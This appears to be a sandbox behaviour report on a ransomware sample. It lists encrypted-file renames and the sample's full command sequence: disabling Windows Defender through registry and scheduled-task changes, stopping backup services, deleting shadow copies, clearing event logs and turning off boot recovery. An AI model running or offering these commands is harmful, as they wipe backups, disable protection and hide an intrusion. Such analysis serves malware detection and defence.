| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-gb\ui-strings.js.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\vlc.mo.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\StoreLogo.scale-100.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-16.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\LTR\contrast-white\WideTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailLargeTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\auxpad\auxbase.xml | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Proof.Culture.msi.16.en-us.xml.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Square44x44Logo.targetsize-48_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-30.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\example_icons.png.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_HgAAAB4AAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\js\startup.js | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\ui-strings.js.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_zh_4.4.0.v20140623020002.jar.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_CgAAAAoAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\uz-Latn-UZ\View3d\3DViewerProductDescription-universal.xml | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.1.7_1.7.25531.0_x64__8wekyb3d8bbwe\AppxSignature.p7x | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\Json\EmailAction-AdaptiveCard.json | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_GgAAABoAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-20_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\pdf.gif.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_EgAAABIAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\de-de\ui-strings.js.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_KAAAACgAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-black_targetsize-256.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ko-kr\ui-strings.js.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hu-hu\ui-strings.js.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipshe.xml | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\casual.dotx.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSmallTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-72_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\fr-FR\msader15.dll.mui | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-fr\ui-strings.js.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\uk-ua\ui-strings.js.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\13.jpg | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_split.scale-100_8wekyb3d8bbwe\resources.pri | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\ui-strings.js.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_KgAAACoAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\de-DE\ieinstal.exe.mui.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\Assets\tinytile.targetsize-48_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-256_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\large_trefoil_2x.png.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_BgAAAAYAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.property_1.4.200.v20140214-0004.jar.00GHcSWUlzvHG8aiKOOURbp3SVZfYLUM1ws_Ar2iXUz_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe
"C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_17102" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_17102" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_17102" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
